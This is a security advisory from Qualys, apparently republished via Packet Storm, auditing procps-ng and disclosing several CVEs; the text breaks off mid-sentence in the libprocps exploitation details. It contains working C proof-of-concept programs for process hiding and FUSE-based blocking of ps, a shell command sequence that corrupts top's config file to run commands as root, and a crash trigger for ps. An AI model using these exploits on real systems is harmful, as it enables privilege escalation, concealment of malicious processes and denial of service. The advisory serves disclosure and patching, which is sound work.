Procps-ng Audit Report
Source: Qualys (qualys.com), via packetstormsecurity.com (PACKETSTORM:147806)
Published: May 22, 2018
EPSS: 0.006 (percentile 77.9%)

`  
Qualys Security Advisory  
  
Procps-ng Audit Report  
  
  
========================================================================  
Contents  
========================================================================  
  
Summary  
1. FUSE-backed /proc/PID/cmdline  
2. Unprivileged process hiding  
3. Local Privilege Escalation in top (Low Impact)  
4. Denial of Service in ps  
5. Local Privilege Escalation in libprocps (High Impact)  
5.1. Vulnerability  
5.2. Exploitation  
5.3. Exploitation details  
5.4. Non-PIE exploitation  
5.5. PIE exploitation  
Acknowledgments  
  
  
========================================================================  
Summary  
========================================================================  
  
We performed a complete audit of procps-ng, the "command line and full  
screen utilities for browsing procfs, a 'pseudo' file system dynamically  
generated by the [Linux] kernel to provide information about the status  
of entries in its process table" (https://gitlab.com/procps-ng/procps).  
procps-ng contains the utilities free, kill, pgrep, pidof, pkill, pmap,  
ps, pwdx, skill, slabtop, snice, sysctl, tload, top, uptime, vmstat, w,  
watch, and the necessary libprocps library.  
  
We discovered and submitted patches for more than a hundred bugs and  
vulnerabilities in procps-ng; for reference, our patches are available  
at:  
  
https://www.qualys.com/2018/05/17/procps-ng-audit-report-patches.tar.gz  
  
In the remainder of this advisory, we present our most interesting  
findings:  
  
1. FUSE-backed /proc/PID/cmdline (CVE-2018-1120)  
  
An attacker can block any read() access to /proc/PID/cmdline by  
mmap()ing a FUSE file (Filesystem in Userspace) onto this process's  
command-line arguments. The attacker can therefore block pgrep, pidof,  
pkill, ps, and w, either forever (a denial of service), or for some  
controlled time (a synchronization tool for exploiting other  
vulnerabilities).  
  
2. Unprivileged process hiding (CVE-2018-1121)  
  
An unprivileged attacker can hide a process from procps-ng's  
utilities, by exploiting either a denial of service (a rather noisy  
method) or a race condition inherent in reading /proc/PID entries (a  
stealthier method).  
  
3. Local Privilege Escalation in top (CVE-2018-1122)  
  
top reads its configuration file from the current working directory,  
without any security check, if the HOME environment variable is unset  
or empty. In this very unlikely scenario, an attacker can carry out an  
LPE (Local Privilege Escalation) if an administrator executes top in  
/tmp (for example), by exploiting one of several vulnerabilities in  
top's config_file() function.  
  
4. Denial of Service in ps (CVE-2018-1123)  
  
An attacker can overflow the output buffer of ps, when executed by  
another user, administrator, or script: a denial of service only (not  
an LPE), because ps mmap()s its output buffer and mprotect()s its last  
page with PROT_NONE (an effective guard page).  
  
5. Local Privilege Escalation in libprocps (CVE-2018-1124)  
  
An attacker can exploit an integer overflow in libprocps's  
file2strvec() function and carry out an LPE when another user,  
administrator, or script executes a vulnerable utility (pgrep, pidof,  
pkill, and w are vulnerable by default; other utilities are vulnerable  
if executed with non-default options). Moreover, an attacker's process  
running inside a container can trigger this vulnerability in a utility  
running outside the container: the attacker can exploit this userland  
vulnerability and break out of the container or chroot. We will  
publish our proof-of-concept exploits in the near future.  
  
Additionally, CVE-2018-1125 has been assigned to  
0008-pgrep-Prevent-a-potential-stack-based-buffer-overflo.patch, and  
CVE-2018-1126 to 0035-proc-alloc.-Use-size_t-not-unsigned-int.patch.  
  
  
========================================================================  
1. FUSE-backed /proc/PID/cmdline (CVE-2018-1120)  
========================================================================  
  
In this experiment, we add a sleep(60) to hello_read() in  
https://github.com/libfuse/libfuse/blob/master/example/hello.c and  
compile it, mount it on /tmp/fuse, and mmap() /tmp/fuse/hello onto the  
command-line arguments of a simple proof-of-concept:  
  
$ gcc -Wall hello.c `pkg-config fuse --cflags --libs` -o hello  
$ mkdir /tmp/fuse  
$ ./hello /tmp/fuse  
  
$ cat > fuse-backed-cmdline.c << "EOF"  
#include <fcntl.h>  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
#include <sys/mman.h>  
#include <sys/stat.h>  
#include <sys/types.h>  
#include <unistd.h>  
  
#define die() do { \
    fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \
    exit(EXIT_FAILURE); \
} while (0)

#define PAGESZ ((size_t)4096)

int
main(const int argc, const char * const argv[])
{
    if (argc <= 0) die();
    /* [arg_start, arg_end) spans all command-line argument strings */
    const char * const arg_start = argv[0];
    const char * const last_arg = argv[argc-1];
    const char * const arg_end = last_arg + strlen(last_arg) + 1;

    if (arg_end <= arg_start) die();
    const size_t len = arg_end - arg_start;
    if (len < 2 * PAGESZ) die();

    /* first page-aligned address inside the argument area */
    char * const addr = (char *)(((size_t)arg_start + PAGESZ-1) & ~(PAGESZ-1));
    if (addr < arg_start) die();
    if (addr + PAGESZ > arg_end) die();

    /* replace that page with a mapping of the slow FUSE-backed file */
    const int fd = open("/tmp/fuse/hello", O_RDONLY);
    if (fd <= -1) die();
    if (mmap(addr, PAGESZ, PROT_READ, MAP_PRIVATE | MAP_FIXED, fd, 0) != addr) die();
    if (close(fd)) die();

    for (;;) {
        sleep(1);
    }
    die();
}
EOF  
$ gcc -Wall fuse-backed-cmdline.c -o fuse-backed-cmdline  
$ ./fuse-backed-cmdline `perl -e 'print "A" x 8192'`  
  
Then, if root executes ps (for example):  
  
# time ps ax  
PID TTY STAT TIME COMMAND  
...  
real 1m0.021s  
user 0m0.003s  
sys 0m0.017s  
  
  
========================================================================  
2. Unprivileged process hiding (CVE-2018-1121)  
========================================================================  
  
Several procps-ng utilities (pgrep, pidof, pkill, ps, w) read the  
/proc/PID/cmdline of every process running on the system; hence, an  
unprivileged attacker can hide a process (albeit noisily) by exploiting  
a denial of service in procps-ng (for example, the FUSE-backed denial of  
service, or one of the integer overflows in file2strvec()).  
  
Alternatively, we devised a stealthier method for hiding a process:  
  
1/ fork() our process until it occupies the last PID  
(/proc/sys/kernel/pid_max - 1) or one of the last PIDs;  
  
2/ monitor (with inotify) the /proc directory and the /proc/PID/stat  
file of one of the very first PIDs, for IN_OPEN events (opendir() and  
open());  
  
3/ when these events occur (when a procps-ng utility starts scanning  
/proc for /proc/PID entries), fork() our process until its PID wraps  
around and occupies one of the very first PIDs;  
  
4/ monitor (with inotify) the /proc directory for an IN_CLOSE_NOWRITE  
event (closedir());  
  
5/ when this event occurs (when the procps-ng utility stops scanning  
/proc), go back to 1/.  
  
This simple method works, because the kernel's proc_pid_readdir()  
function returns the /proc/PID entries in ascending numerical order.  
Moreover, this race condition can be made deterministic by using a  
FUSE-backed /proc/PID/cmdline as a synchronization tool.  
  
$ cat > unprivileged-process-hiding.c << "EOF"  
#include <errno.h>  
#include <limits.h>  
#include <signal.h>  
#include <stdio.h>  
#include <stdlib.h>  
#include <sys/inotify.h>  
#include <sys/stat.h>  
#include <sys/types.h>  
#include <sys/wait.h>  
#include <unistd.h>  
  
#define die() do { \
    fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \
    exit(EXIT_FAILURE); \
} while (0)

int
main(void)
{
    for (;;) {
        char lost[64];
        {
            /* 1/ fork() until the PID counter wraps around */
            const pid_t hi = getpid();
            pid_t lo = fork();
            if (lo <= -1) die();
            if (!lo) { /* child */
                lo = getpid();
                if (lo < hi) exit(EXIT_SUCCESS); /* parent continues */
                for (;;) {
                    if (kill(hi, 0) != -1) continue;
                    if (errno != ESRCH) die();
                    break;
                }
                continue;
            }
            /* parent */
            if (lo > hi) exit(EXIT_FAILURE); /* child continues */
            int status = 0;
            if (waitpid(lo, &status, 0) != lo) die();
            if (!WIFEXITED(status)) die();
            if (WEXITSTATUS(status) != EXIT_SUCCESS) die();

            printf("%d -> %d -> ", hi, lo);
            /* pick the nearest existing /proc/PID/stat below lo */
            for (;;) {
                struct stat st;
                if (--lo <= 0) die();
                snprintf(lost, sizeof(lost), "/proc/%d/stat", lo);
                if (stat(lost, &st) == 0) break;
            }
            printf("%d\n", lo);
        }

        /* 2/ watch /proc and the chosen /proc/PID/stat for IN_OPEN */
        const int pofd = inotify_init();
        if (pofd <= -1) die();
        if (inotify_add_watch(pofd, "/proc", IN_OPEN) <= -1) die();

        const int lofd = inotify_init();
        if (lofd <= -1) die();
        if (inotify_add_watch(lofd, lost, IN_OPEN) <= -1) die();

        const int pcfd = inotify_init();
        if (pcfd <= -1) die();
        if (inotify_add_watch(pcfd, "/proc", IN_CLOSE_NOWRITE) <= -1) die();

        char buf[sizeof(struct inotify_event) + NAME_MAX + 1];
        const struct inotify_event * const evp = (void *)buf;

        for (;;) {
            if (read(pofd, buf, sizeof(buf)) < (ssize_t)sizeof(*evp)) die();
            if (evp->mask & IN_ISDIR) break;
        }

        if (read(lofd, buf, sizeof(buf)) < (ssize_t)sizeof(*evp)) die();
        /* 3/ a scan of /proc has started: fork() until our PID wraps around */
        for (;;) {
            const pid_t hi = getpid();
            pid_t lo = fork();
            if (lo <= -1) die();
            if (lo) exit(EXIT_SUCCESS); /* parent */
            /* child */
            lo = getpid();
            if (lo < hi) {
                printf("%d -> %d\n", hi, lo);
                break;
            }
        }

        /* 4/ wait for the scan to end (closedir() of /proc) */
        for (;;) {
            if (read(pcfd, buf, sizeof(buf)) < (ssize_t)sizeof(*evp)) die();
            if (evp->mask & IN_ISDIR) break;
        }

        /* 5/ clean up and go back to 1/ */
        if (close(pofd)) die();
        if (close(lofd)) die();
        if (close(pcfd)) die();
    }
    die();
}
EOF  
$ gcc -Wall unprivileged-process-hiding.c -o unprivileged-process-hiding  
$ ./unprivileged-process-hiding  
  
Then, if root executes ps (for example):  
  
# ps ax | grep '[u]nprivileged-process-hiding' | wc  
0 0 0  
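
The reason an ascending scan can miss the process can be illustrated with a toy model. This is a sketch under simplifying assumptions, not kernel or procps-ng code: scan_sees() and its parameters are hypothetical, the scan is reduced to a single cursor, and the process moves exactly once.

```c
#include <assert.h>
#include <stdbool.h>

/*
 * Toy model of an ascending scan over PIDs 1..pid_max-1 (hypothetical
 * helper). The process sits at PID `hi` until the scan cursor reaches
 * `moved_at`, then reappears at PID `lo`. Returns true if the cursor ever
 * lands on the PID that the process occupies at that moment.
 */
bool scan_sees(int pid_max, int hi, int lo, int moved_at)
{
    int current = hi;                 /* PID currently held by the process */
    for (int pid = 1; pid < pid_max; pid++) {
        if (pid == current)
            return true;              /* the scan lands on the process */
        if (pid == moved_at)
            current = lo;             /* the process wraps to a low PID */
    }
    return false;
}
```

In this model the process is missed whenever it leaves its high PID before the cursor arrives and reappears at a PID the cursor has already passed; if it never moves, or reappears ahead of the cursor, it is seen.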
  
  
========================================================================  
3. Local Privilege Escalation in top (CVE-2018-1122)  
========================================================================  
  
If a/ an administrator executes top in a directory writable by an  
attacker and b/ the HOME environment variable is unset or empty, then  
top reads its configuration file from the current working directory,  
without any security check:  
  
static void configs_read (void) {
....
   p_home = getenv("HOME");
   if (!p_home || p_home[0] == '\0')
      p_home = ".";
   snprintf(Rc_name, sizeof(Rc_name), "%s/.%src", p_home, Myname);

   if (!(fp = fopen(Rc_name, "r"))) {
....
   if (fp) {
      p = config_file(fp, Rc_name, &tmp_delay);
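
The fallback can be reproduced in isolation. The following is a minimal sketch, not procps-ng code: rc_path() is a hypothetical helper, and the name passed in the usage below ("top") is assumed to match Myname, which is consistent with the .toprc file name used in this section.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/*
 * Mirrors the path selection shown above (hypothetical helper). An unset
 * or empty HOME falls back to ".", i.e. the current working directory.
 */
const char *rc_path(const char *home, const char *myname,
                    char *out, size_t outsz)
{
    if (!home || home[0] == '\0')
        home = ".";
    snprintf(out, outsz, "%s/.%src", home, myname);
    return out;
}
```

With HOME unset or empty the result is ./.toprc, so the file is looked up relative to the directory in which top was started.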
  
Although b/ is very unlikely, we developed a simple command-line method  
for exploiting one of the vulnerabilities in config_file(), when top is  
not a PIE (Position-Independent Executable). For example, on Ubuntu  
16.04.4:  
  
$ file /usr/bin/top  
/usr/bin/top: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=e64fe2c89ff07ca4ce5d169078586d2854628a29, stripped  
  
First, we dump a clean configuration file to /tmp/.toprc, by running top  
and pressing the 'W' key:  
  
$ cd /tmp  
$ env -u HOME top  
W  
q  
  
Second, we add an arbitrary "inspect" command to this configuration file  
(inspect commands are normally executed when the user presses the 'Y'  
key):  
  
$ echo -e 'pipe\tname\tid>>/tmp/top.%d.%lx' >> .toprc  
  
To execute our inspect command without user interaction, we will emulate  
the 'Y' key by jumping directly into inspection_utility(), at 0x40a989  
(the fflush(stdout) is INSP_BUSY's last instruction):  
  
static void inspection_utility (int pid) {
....
         case kbd_ENTER:
            INSP_BUSY;
            Insp_sel = &Inspect.tab[sel];
            Inspect.tab[sel].func(Inspect.tab[sel].fmts, pid);

40a97d: 48 8b 3d 1c f8 20 00    mov    0x20f81c(%rip),%rdi   # 61a1a0 <stdout>
40a984: e8 67 7f ff ff          callq  4028f0 <fflush@plt>
40a989: 48 63 05 2c f9 20 00    movslq 0x20f92c(%rip),%rax   # 61a2bc
40a990: 8b 74 24 74             mov    0x74(%rsp),%esi
40a994: 48 c1 e0 06             shl    $0x6,%rax
40a998: 48 03 05 61 11 23 00    add    0x231161(%rip),%rax   # 63bb00
40a99f: 48 89 05 12 11 23 00    mov    %rax,0x231112(%rip)   # 63bab8
40a9a6: 48 8b 78 18             mov    0x18(%rax),%rdi
40a9aa: ff 10                   callq  *(%rax)
40a9ac: 5b                      pop    %rbx
  
To jump directly into inspection_utility(), we will take control of  
top's execution flow, by exploiting a vulnerability in config_file().  
"sortindx" is read from the configuration file without any sanity check,  
and is later used by window_show() to access a struct FLD_t which  
contains a function pointer "sort":  
  
static int window_show (WIN_t *q, int wmax) {
....
   qsort(q->ppt, Frame_maxtask, sizeof(proc_t*), Fieldstab[q->rc.sortindx].sort);

40de01: ba 08 00 00 00          mov    $0x8,%edx
40de06: 48 c1 e0 05             shl    $0x5,%rax
40de0a: 48 8b 88 30 99 61 00    mov    0x619930(%rax),%rcx
40de11: e8 7a 47 ff ff          callq  402590 <qsort@plt>
  
To take control of this function pointer, we will write 0x40a989's LSW  
(Least Significant Word, 32 bits) into "graph_mems" and 0x40a989's MSW  
(Most Significant Word, 32 bits) into "summclr", which are read from the  
configuration file and written to 0x63ed30 (and 0x63ed34), a memory  
location accessible by 0x619930+(sortindx<<0x5):  
  
static const char *config_file (FILE *fp, const char *name, float *delay) {
....
      if (3 > fscanf(fp, "\twinflags=%d, sortindx=%d, maxtasks=%d, graph_cpus=%d, graph_mems=%d\n"
         , &w->rc.winflags, &w->rc.sortindx, &w->rc.maxtasks, &w->rc.graph_cpus, &w->rc.graph_mems))
            return p;
      if (4 != fscanf(fp, "\tsummclr=%d, msgsclr=%d, headclr=%d, taskclr=%d\n"
         , &w->rc.summclr, &w->rc.msgsclr
         , &w->rc.headclr, &w->rc.taskclr))
            return p;

406f90: 4d 8d b5 30 ed 63 00    lea    0x63ed30(%r13),%r14
.......
406fa9: 41 56                   push   %r14
.......
406fb3: e8 d8 b7 ff ff          callq  402790 <fscanf@plt>
.......
406fca: 49 8d 95 34 ed 63 00    lea    0x63ed34(%r13),%rdx
.......
406fe5: e8 a6 b7 ff ff          callq  402790 <fscanf@plt>
  
Next, we modify the configuration file's "graph_mems", "summclr", and  
"sortindx" accordingly:  
  
$ sed -i s/'graph_mems=[0-9]*'/graph_mems=$((0x40a989))/ .toprc  
  
$ sed -i s/'summclr=[0-9]*'/summclr=0/ .toprc  
  
$ sed -i s/'sortindx=[0-9]*'/sortindx=$(((0x63ed30-0x619930)>>0x5))/ .toprc  
  
Last, we turn off the View_MEMORY bit in the configuration file's  
"winflags", to prevent summary_show() from crashing because of our  
out-of-bounds "graph_mems":  
  
#define View_MEMORY 0x001000 // 'm' - display memory summary

static void summary_show (void) {
....
   if (isROOM(View_MEMORY, 2)) {
....
      if (w->rc.graph_mems) {
....
         ix = w->rc.graph_mems - 1;
....
         snprintf(util, sizeof(util), gtab[ix].swap, (int)((pct_swap * Graph_adj) + .5), gtab[ix].type);
  
$ winflags=`grep -m 1 winflags= .toprc | sed s/'.*winflags=\([0-9]*\).*'/'\1'/`  
$ sed -i s/'winflags=[0-9]*'/winflags=$((winflags&~0x001000))/ .toprc  
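
The values substituted into .toprc by the commands above can be cross-checked with a few lines of C. This is only a worked calculation using the addresses quoted in this section for the Ubuntu 16.04.4 binary; the macro and function names are illustrative assumptions, and other builds of top will have different addresses.

```c
#include <assert.h>
#include <stdint.h>

/* Addresses quoted in this section for Ubuntu 16.04.4's non-PIE top. */
#define FIELDSTAB_SORT 0x619930u  /* base used by window_show()'s lookup */
#define GRAPH_MEMS_AT  0x63ed30u  /* where fscanf() stores graph_mems */
#define TARGET_ADDR    0x40a989u  /* entry point inside inspection_utility() */
#define VIEW_MEMORY    0x001000   /* View_MEMORY bit in winflags */

/* sortindx such that FIELDSTAB_SORT + (sortindx << 5) == GRAPH_MEMS_AT. */
int toprc_sortindx(void)
{
    return (int)((GRAPH_MEMS_AT - FIELDSTAB_SORT) >> 5);
}

/* Low 32 bits of the target address, stored in graph_mems. */
int32_t toprc_graph_mems(void)
{
    return (int32_t)(TARGET_ADDR & 0xffffffffu);
}

/* High 32 bits of the target address, stored in summclr. */
int32_t toprc_summclr(void)
{
    return (int32_t)((uint64_t)TARGET_ADDR >> 32);
}

/* winflags with the memory summary turned off. */
int toprc_winflags(int winflags)
{
    return winflags & ~VIEW_MEMORY;
}
```

The 32-byte stride comes from the "shl $0x5" in window_show()'s disassembly; the high half is zero because the non-PIE executable is mapped below 4GB.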
  
Then, if an administrator executes top in /tmp, without a HOME  
environment variable (or with an empty HOME environment variable):  
  
# cat /tmp/top.*  
cat: '/tmp/top.*': No such file or directory  
  
# cd /tmp  
# env -u HOME top  
...  
signal 11 (SEGV) was caught by top, please  
see http://www.debian.org/Bugs/Reporting  
Segmentation fault (core dumped)  
  
# cat /tmp/top.*  
uid=0(root) gid=0(root) groups=0(root)  
  
  
========================================================================  
4. Denial of Service in ps (CVE-2018-1123)  
========================================================================  
  
ps's functions pr_args(), pr_comm(), and pr_fname() are vulnerable to an  
mmap-based buffer overflow of outbuf (ps's output buffer):  
  
static int pr_args(char *restrict const outbuf, const proc_t *restrict const pp){
  char *endp = outbuf;
  int rightward = max_rightward;
  int fh = forest_helper(outbuf);

  endp += fh;
  rightward -= fh;

  if(pp->cmdline && !bsd_c_option)
    endp += escaped_copy(endp, *pp->cmdline, OUTBUF_SIZE, &rightward);
  else
    endp += escape_command(endp, pp, OUTBUF_SIZE, &rightward, ESC_DEFUNCT);

  if(bsd_e_option && rightward>1) {
    if(pp->environ && *pp->environ) {
      *endp++ = ' ';
      rightward--;
      endp += escape_strlist(endp, pp->environ, OUTBUF_SIZE, &rightward);
    }
  }
  return max_rightward-rightward;
}
  
The number of bytes written to endp by the escape*() functions is added
to endp (a pointer into outbuf), but never subtracted from OUTBUF_SIZE.
Normally "rightward" prevents this buffer overflow, because at most
OUTBUF_SIZE "cells" are written to outbuf and the number of cells equals
the number of "bytes" written; but this does not hold in
escape_str_utf8(), where a multibyte character is counted by its display
width:
  
static int escape_str_utf8(char *restrict dst, const char *restrict src, int bufsize, int *maxcells){
..
    if (!(len = mbrtowc (&wc, src, MB_CUR_MAX, &s)))
..
      int wlen = wcwidth(wc);
..
        memcpy(dst, src, len);
        my_cells += wlen;
        dst += len;
        my_bytes += len;
        src += len;
  
For example, in the "en_US.UTF-8" locale, the multibyte sequence  
"\xf4\x81\x8e\xb6" consumes 4 bytes, but only 1 cell, and an easy  
trigger for one of the outbuf overflows is:  
  
$ (A=`python -c 'print "\xf4\x81\x8e\xb6" * 32767'` exec -a `python -c 'print "A" * 65535'` sleep 60) &  
[1] 2670  
  
# env LANG=en_US.UTF-8 ps awwe  
PID TTY STAT TIME COMMAND  
...  
Signal 11 (SEGV) caught by ps (procps-ng version 3.3.10).  
2670 pts/0 S 0:00ps:display.c:66: please report this bug  
Segmentation fault  
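
The gap between cells and bytes can be sketched with a simplified model. It copies no real multibyte data and is neither the procps-ng code nor its patch; the function names, the uniform character size, and the buffer size used in the usage note are assumptions chosen for illustration.

```c
#include <assert.h>
#include <stddef.h>

/*
 * Each character occupies `len` bytes and `width` screen cells. Returns
 * the number of bytes that would be written for up to `nchars` characters
 * when only the cell budget is enforced.
 */
size_t bytes_if_only_cells_checked(size_t nchars, size_t len, size_t width,
                                   size_t max_cells)
{
    size_t bytes = 0, cells = 0;
    for (size_t i = 0; i < nchars; i++) {
        if (cells + width > max_cells)
            break;                    /* out of cells */
        bytes += len;
        cells += width;
    }
    return bytes;
}

/* Same loop, but the remaining byte capacity is checked as well. */
size_t bytes_if_both_checked(size_t nchars, size_t len, size_t width,
                             size_t max_cells, size_t bufsize)
{
    size_t bytes = 0, cells = 0;
    for (size_t i = 0; i < nchars; i++) {
        if (cells + width > max_cells || bytes + len > bufsize)
            break;                    /* out of cells or out of bytes */
        bytes += len;
        cells += width;
    }
    return bytes;
}
```

With a hypothetical 1024-byte buffer and a cell budget of 1024, 4-byte characters that are 1 cell wide produce 4096 bytes under the first rule but stop at 1024 bytes under the second; single-byte characters stay within bounds under both.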
  
This buffer overflow is a denial of service only (not an LPE), because  
ps mmap()s outbuf and mprotect()s its last page with PROT_NONE (an  
effective guard page):  
  
void init_output(void){
....
  outbuf = mmap(
    0,
    page_size * (outbuf_pages+1), // 1 more, for guard page at high addresses
    PROT_READ | PROT_WRITE,
    MAP_PRIVATE | MAP_ANONYMOUS,
    -1,
    0
  );
....
  mprotect(outbuf + page_size*outbuf_pages, page_size, PROT_NONE); // guard page
  
  
========================================================================  
5. Local Privilege Escalation in libprocps (CVE-2018-1124)  
========================================================================  
  
========================================================================  
5.1. Vulnerability  
========================================================================  
  
libprocps's file2strvec() function parses a process's /proc/PID/cmdline  
(or /proc/PID/environ), and creates an in-memory copy of this process's  
argv[] (command-line argument strings, and pointers to these strings).  
file2strvec() is called when either PROC_FILLCOM or PROC_FILLARG, but  
not PROC_EDITCMDLCVT, is passed to openproc() or readproctab() (or  
PROC_FILLENV but not PROC_EDITENVRCVT).  
  
file2strvec() is vulnerable to three integer overflows (of "tot", "c",  
and "tot + c + align"):  
  
static char** file2strvec(const char* directory, const char* what) {
    char buf[2048]; /* read buf bytes at a time */
    char *p, *rbuf = 0, *endbuf, **q, **ret;
    int fd, tot = 0, n, c, end_of_file = 0;
    int align;
...
    /* read whole file into a memory buffer, allocating as we go */
    while ((n = read(fd, buf, sizeof buf - 1)) >= 0) {
...
        rbuf = xrealloc(rbuf, tot + n); /* allocate more memory */
        memcpy(rbuf + tot, buf, n); /* copy buffer into it */
        tot += n; /* increment total byte ctr */
...
    endbuf = rbuf + tot; /* count space for pointers */
    align = (sizeof(char*)-1) - ((tot + sizeof(char*)-1) & (sizeof(char*)-1));
    for (c = 0, p = rbuf; p < endbuf; p++) {
        if (!*p || *p == '\n')
            c += sizeof(char*);
...
    c += sizeof(char*); /* one extra for NULL term */

    rbuf = xrealloc(rbuf, tot + c + align); /* make room for ptrs AT END */
  
To the best of our knowledge, the integer overflows of "c" and "tot + c  
+ align" are not exploitable beyond a denial of service: they result in  
an mmap-based buffer overflow of rbuf, but with pointers only (pointers  
to our command-line argument strings, and a NULL terminator). Similarly,  
we were unable to exploit the integer overflow of "tot" on 32-bit.  
  
On 64-bit, however, the integer overflow of "tot" results in a memcpy()  
of arbitrary bytes (our command-line arguments) to an offset of roughly  
-2GB below rbuf. Surprisingly, the "xrealloc(rbuf, tot + n)" before the  
memcpy() does not exit() when "tot" becomes negative, because xrealloc()  
incorrectly uses an "unsigned int size" argument instead of a size_t  
(CVE-2018-1126):  
  
void *xrealloc(void *oldp, unsigned int size) {
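
The arithmetic behind this can be sketched as follows. The helpers are hypothetical and only model the integer conversions; they do not allocate or copy anything. The inputs in the usage note are taken from this advisory: 2047 is "sizeof buf - 1" in file2strvec(), and 2147482113 is the positive_tot value printed in the sample exploit output of section 5.4.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Models "tot += n" for a 32-bit int with two's-complement wrap-around.
 * Signed overflow is undefined behaviour in C, so the addition is done on
 * unsigned values; converting the result back to int32_t is
 * implementation-defined and wraps on GCC and Clang.
 */
int32_t wrapped_tot(int32_t tot, int32_t n)
{
    return (int32_t)((uint32_t)tot + (uint32_t)n);
}

/* Size seen by an xrealloc() that takes "unsigned int size". */
uint32_t size_as_unsigned_int(int32_t tot, int32_t n)
{
    return (uint32_t)wrapped_tot(tot, n);
}

/*
 * Size seen by an allocator that takes a 64-bit size_t: the negative int
 * is sign-extended into an enormous value.
 */
uint64_t size_as_size_t(int32_t tot, int32_t n)
{
    return (uint64_t)(int64_t)wrapped_tot(tot, n);
}
```

Starting from tot = 2147482113, one more read of 2047 bytes wraps tot to -2147483136, which is the "roughly -2GB" offset mentioned above. As an unsigned int the requested size is 2147484160 (about 2GB, a request that can succeed), whereas as a 64-bit size_t it would exceed 2^63 and could not be satisfied.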
  
========================================================================  
5.2. Exploitation  
========================================================================  
  
To exploit the integer overflow of "tot" on 64-bit, we are faced with  
several difficulties:  
  
- We must defeat NX, ASLR, PIE, full RELRO, SSP (Stack-Smashing  
Protector), and FORTIFY.  
  
- Our exploit must be one-shot, or as close to one-shot as possible: we  
may use brute-force if the target procps-ng utility is executed by a  
script, but we have only one chance to exploit this vulnerability if  
the target utility is executed manually by an administrator.  
  
- We have no control over the target utility's command-line arguments,  
environment variables, or resource limits (it is executed by another  
user, administrator, or script), and we have no direct channel for an  
information leak (we have no access to the target utility's output,  
for example).  
  
- We were unable to exploit the integer overflow of "tot" when rbuf is  
mmap()ed (but we were also unable to prove that it is unexploitable);  
when the integer "tot" overflows, rbuf is an mmap()ed chunk (its size  
is roughly 2GB), and because Linux's mmap() is a top-down allocator,  
we believe that:  
  
. rbuf must be allocated in a hole of the mmap-space (to survive the  
memcpy() at a negative offset below rbuf);  
  
. it is impossible to make such a large hole (in procps-ng, calls to  
the malloc functions are extremely rare).  
  
Despite these difficulties, we developed proof-of-concept exploits
against the procps-ng utility "w" on Ubuntu 16.04 (a one-shot exploit
against a partial RELRO, non-PIE w), and on Debian 9 and Fedora 27 (a
nearly one-shot exploit against a full RELRO, PIE w). The key idea: if
we first force "w" to malloc()ate n_mmaps_max = 64K mmap()ed chunks
(whose size is larger than mmap_threshold = 128KB), then malloc() will
no longer call mmap(), but will call brk() instead, even for chunks
larger than mmap_threshold. The 2GB rbuf (after the integer overflow of
tot) will therefore be allocated on the heap by brk(), and because brk()
is a bottom-up allocator, we can easily arrange for the memcpy() at rbuf
- 2GB to overwrite the beginning of the heap:
  
- if w is not a PIE, we overwrite libprocps's internal PROCTAB structure  
and its function pointers;  
  
- if w is a PIE, we overwrite the glibc's internal *gettext() structures  
and transform this memory corruption into a format-string exploit.  
  
To force 64K allocations of 128KB (8GB) in w, we need 64K distinct PIDs  
(each /proc/PID/cmdline allocates 128KB in file2strvec()): consequently,  
/proc/sys/kernel/pid_max must be greater than 64K (it is 32K by default,  
even on 64-bit). This is not an unusual setting: large servers (database  
servers, container and storage platforms) commonly increase the value of  
pid_max (up to 4M on 64-bit). Besides pid_max, other settings may limit  
our ability to spawn 64K processes: /proc/sys/kernel/threads-max,  
RLIMIT_NPROC, and systemd-logind's UserTasksMax. Unlike pid_max,  
however, these limits are not insuperable obstacles:  
  
- they may be naturally greater than 64K, depending on the total number  
of RAM pages (for /proc/sys/kernel/threads-max and RLIMIT_NPROC) or  
the value of pid_max (for UserTasksMax);  
  
- they may not apply to the attacker's user account (for example,  
systemd-logind may not at all manage this specific user account);  
  
- in any case, we do not need to spawn 64K concurrent processes: if we  
use /proc/PID/cmdline as a FUSE-backed synchronization tool, we need  
only a few concurrent processes.  
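
The allocator behaviour that this section relies on can be summarized by a simplified decision rule. This is our own model of the behaviour described above, not glibc source: served_by_mmap() is a hypothetical helper, the constants are the two values quoted in this section, and boundary handling (chunk overhead, exact comparison) is deliberately simplified.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

#define MMAP_THRESHOLD ((size_t)128 * 1024)  /* mmap_threshold = 128KB */
#define N_MMAPS_MAX    ((size_t)64 * 1024)   /* n_mmaps_max = 64K */

/*
 * A large request is served by mmap() only while the number of live
 * mmap()ed chunks is below the limit; otherwise it falls back to the
 * brk()-managed heap.
 */
bool served_by_mmap(size_t request, size_t live_mmapped_chunks)
{
    return request >= MMAP_THRESHOLD && live_mmapped_chunks < N_MMAPS_MAX;
}
```

In this model a 2GB request goes to mmap() while fewer than 64K mmap()ed chunks are live, and to brk() once that limit has been reached, which is the state the 64K "mmap" processes are meant to produce.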
  
========================================================================  
5.3. Exploitation details  
========================================================================  
  
Our proof-of-concept exploit spawns five different types of processes  
("main", "mmap", "dist", "wrap", and "srpt"):  
  
- a long-lived "main" process, which spawns and coordinates the other  
processes;  
  
- 64K long-lived "mmap" processes, which guarantee that the ~2GB rbufs  
of our "dist" and "wrap" processes are allocated by brk() in the heap  
of our future "w" target; the "mmap" processes occupy the lowest PIDs  
available, to avoid interference from other processes with the heap  
layout of w;  
  
- a long-lived "dist" ("distance") process, whose /proc/PID/cmdline is  
carefully constructed to cover the exact distance between our target  
structure (at the beginning of w's heap) and the rbuf of our "wrap"  
process (at the end of w's heap);  
  
- a long-lived "wrap" ("integer wrap") process, which overflows the  
integer "tot" and overwrites our target structure at the beginning of  
w's heap (with the memcpy() at rbuf - 2GB);  
  
- short-lived "srpt" ("simulate readproctab") processes, which measure  
the exact distance between our target structure (at the beginning of  
w's heap) and the rbuf of our "wrap" process (at the end of w's heap);  
because this distance depends on an accurate list of processes running  
on the system, our exploit regularly spawns "srpt" processes until the  
distance stabilizes (it is particularly unstable after a reboot).  
  
We use a few noteworthy tricks in this exploit:  
  
- we do not fork() but clone() the "mmap" processes (we use the flags  
CLONE_VM | CLONE_FS | CLONE_FILES | CLONE_SYSVSEM | CLONE_SIGHAND, but  
